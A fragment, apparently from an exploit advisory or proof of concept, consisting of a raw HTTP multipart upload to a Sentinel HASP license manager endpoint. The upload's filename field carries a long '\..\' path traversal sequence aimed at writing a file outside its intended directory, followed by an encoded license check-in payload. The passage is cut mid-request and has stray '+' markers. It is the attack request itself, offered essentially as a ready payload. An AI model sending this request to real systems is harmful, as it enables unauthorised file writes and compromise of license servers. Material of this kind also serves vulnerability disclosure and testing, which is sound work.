hasplmlang=_int_ +Connection: close + +------WebKitFormBoundaryVlbofFpDmUw9CugB +Content-Disposition: form-data; name="check_in_file"; filename="\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\jxzp" +Content-Type: application/octet-stream + + + + + 18.0.1.55505 + LAB-ZSL + LAB-ZSL + + MXhJSWPdmwJr2iAIUgAGKBk/7N4U2GbJjLA6hGC1VHDvrsA2W+8e2ChuAFYgF6ZG + ttm6N6iupYkEEHzcQQrG1r0pIGBarRkAy0GR46nuTYFtm8iAMA5IBQoP82wKbLMl + gUKpUABvAmhFimCbrXumJpsOA8ApTjaU12zdm0LkvsgTAPECCFTau + + + + +------WebKitFormBoundaryVlbofFpDmUw9CugB-- +